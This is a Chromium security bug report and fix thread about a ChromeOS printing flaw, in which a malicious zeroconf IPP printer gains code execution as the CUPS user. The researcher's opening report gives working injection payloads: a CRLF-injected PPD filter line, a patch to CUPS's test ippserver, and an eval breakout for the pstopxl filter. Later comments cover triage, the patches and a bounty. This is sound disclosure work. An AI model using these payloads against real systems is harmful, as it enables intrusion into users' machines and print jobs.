New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Starred by 2 users

Issue metadata

Status: Fixed
Owner:
Closed: Nov 2017
Cc:
Components:
EstimatedDays: ----
NextAction: 2017-10-30
OS: Chrome
Pri: 1
Type: Bug-Security



Sign in to add a comment
link

Issue 777215: Security: ChromeOS printer zeroconf remote code execution

Reported by r...@rorym.cnamara.com, Oct 22 2017

Issue description

Google Chrome		61.0.3163.123 (Official Build) (64-bit)
Platform		9765.85.0 (Official Build) stable-channel swanky
Firmware Version	Google_Swanky.5216.238.5

Two different bugs (CRLF injection and eval based code injection) can be used by a malicious IPP server to cause ChromeOS to install a malicious PPD file which, on printing, will cause the payload to be executed with the same privileges as the cups daemon (cups:root inside a seccomp jail [1]).

To enable exploitation, the test ippserver from the cups distribution [2] can be modified and used.

The IPP server can specify formats to be accepted by the printer, which can be used to specify a specific filter executable to be executed when a print job is sent. Since the passed value is interpolated into the cupsFilter2 line, it is necessary to inject newlines and PPD comment characters to completely control the configuration item.

cupsFilter2 lines should normally look similar to:

*cupsFilter2: "application/vnd.cups-pdf application/pdf 10 -"

but the IPP server can control the second parameter, so we can inject a payload as below:

*cupsFilter2: "application/pdf application/vnd.cups-postscript 0 pstopxl"
*%;echo ********EXPLOIT START********|logger;env|logger;echo ****    ****|logger|cat ${PPD}|logger;echo ********EXPLOIT END********|logger;exit
*% application/pdf application/vnd.cups-postscript 0 pstopxl"
*%;echo ********EXPLOIT START********|logger;env|logger;echo ****    ****|logger|cat ${PPD}|logger;echo ********EXPLOIT END********|logger;exit
*% 10 -"

The payload is injected twice, but we can use \n*% to cause subsequent lines to be turned into comments. The format of our payload will become clear with the second exploit.

The configuration for this bug is specified in the 'formats' variable in the malicious IPP server [3], which we can change to the following to achieve the above payload:

-		*formats = "application/pdf,image/jpeg,image/pwg-raster";
+		*formats = "application/pdf,application/pdf application/vnd.cups-postscript 0 pstopxl\"\n*%;echo ********EXPLOIT START********|logger;env|logger;echo ****    ****|logger|cat ${PPD}|logger;echo ********EXPLOIT END********|logger;exit\n*%";

Along with our payload, we also specify the 'pstopxl' filter executable, which is present on ChromeOS. This executable contains an eval based command injection vulnerability. eval is used in multiple locations throughout the cups filter distributions, but the specific one we exploit in this case is the DefaultInputSlot injection point [4]. This parameter can also be controlled by the malicious IPP server to cause the injection. In this case we modify the 'media_source_supported' array by changing the default value of 'auto' to one that will break out of the eval location and execute our code.

-  "auto",
+  "x}\"$(sh${IFS}${PPD})\"x",

Since the payload length is limited, we use the PPD file itself as a shell based payload. As can be seen in the above cupsFilter2 payload, we use ; to add multiple commands on the same line, and an 'exit' so the payload is not executed twice. The value of ${PPD} is set by the parent of the filter, so we do not need to worry about locating our payload file. In my tests, all lines in the PPD file are not valid shell commands, so there are no side effects other than errors being output for invalid commands.

With these two exploits the malicious IPP server can gain command execution on ChromeOS as cups:root, inside the seccomp jail [1]. I was unable to escape from the seccomp jail and limited user, but the seccomp policy is open enough for most malicious activities. From the restricted position, the payload should be able to read most current and future print jobs (after a reboot it would be necessary for the malicious printer to be re-used as there is no persistence)

To reproduce this vulnerability, patch ippserver from the cups distribution using the attached patch (commit 0bc1a539f used for testing, but any should work).  Compile and run similarly to the following:

sudo ./ippserver -v exploit -p 631

Add a new printer
- chrome://md-settings/cupsPrinters
- or print a page, change Destination, Local Destinations -> Manage (will redirect to chrome://settings/cupsPrinters)
Add printer, Add nearby printer

Once the printer has been added using zeroconf, print to it and observe the payload output in file:///var/log/messages (^F for EXPLOIT). Interestingly,
printers added using this method persist across a powerwash (noticed when transitioning into dev mode).

The exploit printer could masquerade as a legitimate printer, and proxy all jobs to the real printer for invisible exploitation.

Judging by the network traffic generated by the print preview window, I would imagine that one day local printers would automatically appear, increasing the likelihood of this exploit, but I was unable to get this to work, hence having to navigate to the settings and add the printer with more button clicks.

A LAN presence is required to exploit this vulnerability.

I have also attached the PPD file created on the device (obtained via developer mode) to show the injection locations.

[1] https://chromium.googlesource.com/chromiumos/overlays/chromiumos-overlay/+/master/net-print/cups/files/cupsd-seccomp-amd64.policy
[2] https://github.com/apple/cups/blob/master/test/ippserver.c
[3] https://github.com/apple/cups/blob/master/test/ippserver.c#L485
[4] https://github.com/richud/gstoraster/blob/master/cups/gstopxl#L110
 
ipp.patch
1.8 KB Download
zeroconf-133d2240cda28dd836f79ecdf2654c8e.ppd
5.4 KB Download

Comment 1 by elawrence@chromium.org, Oct 23 2017

Components: Internals>Printing>CUPS
Labels: OS-Chrome

Comment 2 by kerrnel@chromium.org, Oct 24 2017

Cc: jorgelo@chromium.org adlr@chromium.org mnissler@chromium.org

Comment 3 by jorgelo@chromium.org, Oct 25 2017

Labels: Security_Severity-High Security_Impact-Stable M-62
Owner: adlr@chromium.org
Sandboxed RCE is... not great.

Andrew, this needs to be handled by the CUPS CrOS printing team ASAP as a high-severity bug.

Comment 4 by jorgelo@chromium.org, Oct 25 2017

NextAction: 2017-10-27

Comment 5 by jorgelo@chromium.org, Oct 25 2017

Also, do we even need zeroconf?

Comment 6 by adlr@chromium.org, Oct 25 2017

Labels: Pri-0
Owner: skau@chromium.org
Status: Assigned (was: Unconfirmed)
Zeroconf is a critical feature for the product. Assigning to Sean to look at as Justin (who worked a lot on this) is ooo a lot of this week, including now.

Comment 7 by jorgelo@chromium.org, Oct 25 2017

Labels: -Pri-0 Pri-1
We usually mark high-severity bugs as P1 (sandboxed code exec is high-severity per our ratings at http://www.chromium.org/developers/severity-guidelines), but we do expect it to be fixed in the current milestone and backported to stable.

Thanks!

Comment 8 by skau@chromium.org, Oct 26 2017

Status: Started (was: Assigned)
I'm looking into this.  We can likely disable downloading arbitrary PPDs from untrusted servers.

Comment 9 by skau@chromium.org, Oct 26 2017

There are two patches from upstream that restrict what filters we accept which will prevent the pstopxl filter being configured for zeroconf printers.

https://github.com/apple/cups/commit/07428f6a640ff93aa0b4cc69ca372e2cf8490e41
https://github.com/apple/cups/commit/1add23375658e9163e5493ee19de7c9f7a9b483b

Comment 10 by jorgelo@chromium.org, Oct 26 2017

Thanks Sean! Can we also do something about the CRLF injection, maybe patch that locally? Or, can we remove and/or fix the eval in the pstopxl filter?

Comment 11 by r...@rorym.cnamara.com, Oct 26 2017

Quick note, pstopxl was not the only filter that appeared to contain exploitable evals, I can't check on my device right now but grepping in /usr/libexec/cups/filter/ should find more.

Comment 12 by monor...@bugs.chromium.org, Oct 27 2017

The NextAction date has arrived: 2017-10-27

Comment 13 by jorgelo@chromium.org, Oct 27 2017

Hey Sean, were you able to at least start landing those patches? We can look at the other filters next, but we should start by making sure pstopxl is not reachable.

Thanks!

Comment 14 by skau@chromium.org, Oct 27 2017

I just sent a CL so we don't configure pstopxl as a filter for an automatically configured printer.

I'm going to look into the filters before the CRLF injection.  We're going to stop allowing insertion of arbitrary values for filters but there are other fields where we should disallow CRLF.

Comment 15 by skau@chromium.org, Oct 28 2017

NextAction: 2017-10-30

Comment 16 by skau@chromium.org, Oct 29 2017

It looks like gstopxl is from cups-filters, not ghostscript.  I'm investigating if it can be removed.

Comment 17 by monor...@bugs.chromium.org, Oct 30 2017

The NextAction date has arrived: 2017-10-30

Comment 18 by bugdroid1@chromium.org, Oct 30 2017

Project Member
The following revision refers to this bug:
  https://chromium.googlesource.com/chromiumos/overlays/chromiumos-overlay/+/2ef707a9b50f577b2d4b5fdfcea99736a5ac9448

commit 2ef707a9b50f577b2d4b5fdfcea99736a5ac9448
Author: Sean Kau <skau@chromium.org>
Date: Mon Oct 30 23:21:07 2017

net-print/cups: Backport patches to restrict IPP Everywhere filters.

Restrict filters we accept for IPP Everywhere configurations to
exactly PDF, JPEG, PNG, PWG-Raster.

URF was added in the original patch but has been explicitly
excluded since we lack the appropriate filter changes.

BUG= chromium:777215 
TEST=Verify zeroconf setup still works.

Change-Id: Ief1ab83cfc0f1cb5c7c71740ddf5a1aeed066bcb
Reviewed-on: https://chromium-review.googlesource.com/742381
Commit-Ready: Sean Kau <skau@chromium.org>
Tested-by: Sean Kau <skau@chromium.org>
Reviewed-by: Jorge Lucangeli Obes <jorgelo@chromium.org>

[rename] https://crrev.com/2ef707a9b50f577b2d4b5fdfcea99736a5ac9448/net-print/cups/cups-2.1.4-r28.ebuild
[add] https://crrev.com/2ef707a9b50f577b2d4b5fdfcea99736a5ac9448/net-print/cups/files/cups-2.2.2-Only-list-supported-PDLs-Issue-4923.patch
[modify] https://crrev.com/2ef707a9b50f577b2d4b5fdfcea99736a5ac9448/net-print/cups/cups-2.1.4.ebuild
[add] https://crrev.com/2ef707a9b50f577b2d4b5fdfcea99736a5ac9448/net-print/cups/files/cups-2.2.2-Tweak-the-PDL-priority-Issue-4932.patch

Comment 19 by skau@chromium.org, Oct 30 2017

Cc: weifangsun@chromium.org

Comment 20 by skau@chromium.org, Nov 1 2017

Cc: briannorris@chromium.org

Comment 21 by skau@chromium.org, Nov 3 2017

Updating cups-filters to the current version (1.17.8) removes the eval vulnerability.

Comment 22 by skau@chromium.org, Nov 3 2017

I'm going to mark this as fixed so I can get the cherry-pick approved.

Comment 23 by skau@chromium.org, Nov 3 2017

Labels: Merge-Request-63 Merge-Request-62
Status: Fixed (was: Started)

Comment 24 by sheriffbot@chromium.org, Nov 3 2017

Project Member
Labels: -Merge-Request-63 Merge-Review-63 Hotlist-Merge-Review
This bug requires manual review: M63 has already been promoted to the beta branch, so this requires manual review
Please contact the milestone owner if you have questions.
Owners: cmasso@(Android), cmasso@(iOS), gkihumba@(ChromeOS), govind@(Desktop)

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 25 by sheriffbot@chromium.org, Nov 4 2017

Project Member
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify

Comment 26 by awhalley@chromium.org, Nov 6 2017

Labels: Release-0-M62

Comment 27 by awhalley@chromium.org, Nov 6 2017

Labels: CVE-2017-15400 reward-topanel

Comment 28 by josa...@chromium.org, Nov 6 2017

Labels: -Merge-Request-62 -Merge-Review-63 Merge-Approved-62 Merge-Approved-63
approving M-62 and M-63

Comment 29 by bugdroid1@chromium.org, Nov 6 2017

Project Member
Labels: merge-merged-release-R62-9901.B
The following revision refers to this bug:
  https://chromium.googlesource.com/chromiumos/overlays/chromiumos-overlay/+/3de55925d80fc923c793a0ffefdb0cbb177996d6

commit 3de55925d80fc923c793a0ffefdb0cbb177996d6
Author: Sean Kau <skau@chromium.org>
Date: Mon Nov 06 22:42:46 2017

net-print/cups: Backport patches to restrict IPP Everywhere filters.

Restrict filters we accept for IPP Everywhere configurations to
exactly PDF, JPEG, PNG, PWG-Raster.

URF was added in the original patch but has been explicitly
excluded since we lack the appropriate filter changes.

BUG= chromium:777215 
TEST=Verify zeroconf setup still works.

Change-Id: Ief1ab83cfc0f1cb5c7c71740ddf5a1aeed066bcb
Previous-Reviewed-on: https://chromium-review.googlesource.com/742381
(cherry picked from commit ea0ae7891ba8e2983634f406c9df7ce746962a90)
Reviewed-on: https://chromium-review.googlesource.com/747848
Reviewed-by: Jorge Lucangeli Obes <jorgelo@chromium.org>
Commit-Queue: Sean Kau <skau@chromium.org>
Tested-by: Sean Kau <skau@chromium.org>
Trybot-Ready: Sean Kau <skau@chromium.org>

[add] https://crrev.com/3de55925d80fc923c793a0ffefdb0cbb177996d6/net-print/cups/cups-2.1.4-r28.ebuild
[add] https://crrev.com/3de55925d80fc923c793a0ffefdb0cbb177996d6/net-print/cups/files/cups-2.2.2-Only-list-supported-PDLs-Issue-4923.patch
[modify] https://crrev.com/3de55925d80fc923c793a0ffefdb0cbb177996d6/net-print/cups/cups-2.1.4.ebuild
[add] https://crrev.com/3de55925d80fc923c793a0ffefdb0cbb177996d6/net-print/cups/files/cups-2.2.2-Tweak-the-PDL-priority-Issue-4932.patch

Comment 30 by bugdroid1@chromium.org, Nov 6 2017

Project Member
Labels: merge-merged-release-R63-10032.B
The following revision refers to this bug:
  https://chromium.googlesource.com/chromiumos/overlays/chromiumos-overlay/+/00e71e234336642d5ccbdc657286fd7d9086602d

commit 00e71e234336642d5ccbdc657286fd7d9086602d
Author: Sean Kau <skau@chromium.org>
Date: Mon Nov 06 22:42:51 2017

net-print/cups: Backport patches to restrict IPP Everywhere filters.

Restrict filters we accept for IPP Everywhere configurations to
exactly PDF, JPEG, PNG, PWG-Raster.

URF was added in the original patch but has been explicitly
excluded since we lack the appropriate filter changes.

BUG= chromium:777215 
TEST=Verify zeroconf setup still works.

Change-Id: Ief1ab83cfc0f1cb5c7c71740ddf5a1aeed066bcb
Previous-Reviewed-on: https://chromium-review.googlesource.com/742381
(cherry picked from commit 9e2af650268d45e9e51ae1da29ff6bbed934ecf5)
Reviewed-on: https://chromium-review.googlesource.com/747871
Reviewed-by: Jorge Lucangeli Obes <jorgelo@chromium.org>
Commit-Queue: Sean Kau <skau@chromium.org>
Tested-by: Sean Kau <skau@chromium.org>
Trybot-Ready: Sean Kau <skau@chromium.org>

[rename] https://crrev.com/00e71e234336642d5ccbdc657286fd7d9086602d/net-print/cups/cups-2.1.4-r28.ebuild
[add] https://crrev.com/00e71e234336642d5ccbdc657286fd7d9086602d/net-print/cups/files/cups-2.2.2-Only-list-supported-PDLs-Issue-4923.patch
[modify] https://crrev.com/00e71e234336642d5ccbdc657286fd7d9086602d/net-print/cups/cups-2.1.4.ebuild
[add] https://crrev.com/00e71e234336642d5ccbdc657286fd7d9086602d/net-print/cups/files/cups-2.2.2-Tweak-the-PDL-priority-Issue-4932.patch

Comment 31 by bugdroid1@chromium.org, Nov 7 2017

Project Member
The following revision refers to this bug:
  https://chromium.googlesource.com/chromiumos/overlays/portage-stable/+/8827c2d9757d829a474163eb7150e66e37064284

commit 8827c2d9757d829a474163eb7150e66e37064284
Author: Sean Kau <skau@chromium.org>
Date: Tue Nov 07 07:49:01 2017

net-print/cups-filters: Update to 1.17.8

Updating the cups-fitlers package to 1.17.8 from 1.8.2.  Many of
the filters were rewritten to remove a lot of the bash scripts.
The previously included patches are in 1.17.8.

BUG= chromium:777215 
TEST=Print a page using the foomatic-rip filter.

Change-Id: Icbde6517925dd88b3fdf6d170b500dabc144effc
Reviewed-on: https://chromium-review.googlesource.com/750045
Commit-Ready: Brian Norris <briannorris@chromium.org>
Tested-by: Sean Kau <skau@chromium.org>
Reviewed-by: Brian Norris <briannorris@chromium.org>
Reviewed-by: Mike Frysinger <vapier@chromium.org>

[modify] https://crrev.com/8827c2d9757d829a474163eb7150e66e37064284/net-print/cups-filters/Manifest
[delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-filters-1.8.2-configure-PKG_CONFIG.patch
[delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-filters-1.0.71-poppler0340.patch
[add] https://crrev.com/8827c2d9757d829a474163eb7150e66e37064284/net-print/cups-filters/files/cups-browsed.init.d-r1
[delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-browsed.service
[modify] https://crrev.com/8827c2d9757d829a474163eb7150e66e37064284/net-print/cups-filters/metadata.xml
[delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-filters-1.0.65-poppler0310.patch
[delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-browsed.init.d
[delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/cups-filters-1.8.2-r5.ebuild
[delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-filters-1.8.2-gstoraster-path-lookup.patch
[add] https://crrev.com/8827c2d9757d829a474163eb7150e66e37064284/net-print/cups-filters/cups-filters-1.17.8.ebuild
[delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-filters-1.8.2-disable-ijs.patch
[delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-filters-1.0.53-uclibc.patch
[delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-filters-1.8.2-foomatic-rip-sig-pipe.patch
[delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-filters-1.8.2-gstoraster.patch
[delete] https://crrev.com/f05eabba16124607c7aaebb3bd0ea94afee89b8b/net-print/cups-filters/files/cups-filters-1.8.1-allow-disable-ghostscript.patch

Comment 32 by awhalley@chromium.org, Nov 9 2017

Labels: -reward-topanel reward-unpaid reward-2000
*** Boilerplate reminders! ***
Please do NOT publicly disclose details until a fix has been released to all our users. Early public disclosure may cancel the provisional reward. Also, please be considerate about disclosure when the bug affects a core library that may be used by other products. Please do NOT share this information with third parties who are not directly involved in fixing the bug. Doing so may cancel the provisional reward. Please be honest if you have already disclosed anything publicly or to third parties. Lastly, we understand that some of you are not interested in money. We offer the option to donate your reward to an eligible charity. If you prefer this option, let us know and we will also match your donation - subject to our discretion. Any rewards that are unclaimed after 12 months will be donated to a charity of our choosing.
*********************************

Comment 33 by awhalley@chromium.org, Nov 9 2017

Nice one! The VRP panel decided to award $2,000 for this report.  Thanks!

Comment 34 by awhalley@chromium.org, Nov 10 2017

Labels: -reward-unpaid reward-inprocess

Comment 35 by sheriffbot@chromium.org, Nov 10 2017

Project Member
Cc: josa...@chromium.org
This issue has been approved for a merge. Please merge the fix to any appropriate branches as soon as possible!

If all merges have been completed, please remove any remaining Merge-Approved labels from this issue.

Thanks for your time! To disable nags, add the Disable-Nags label.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 36 by skau@chromium.org, Nov 10 2017

Labels: -Merge-Approved-62 -Merge-Approved-63

Comment 37 by jorgelo@chromium.org, Nov 16 2017

Just to close the loop on this, I believe the merges broke some filters which is why Sean did not backport the CUPS uprev.

Comment 38 by skau@chromium.org, Nov 16 2017

Yes.  The filters are not being backported.  However, the remote vulnerability is fixed by the cups patch which has been backported to 62.

Comment 39 by sheriffbot@chromium.org, Feb 9 2018

Project Member
Labels: -Restrict-View-SecurityNotify allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 40 by sheriffbot@chromium.org, Mar 27 2018

Project Member
Labels: -M-62 M-65

Comment 41 by awhalley@chromium.org, Apr 25 2018

Labels: CVE_description-submitted

Sign in to add a comment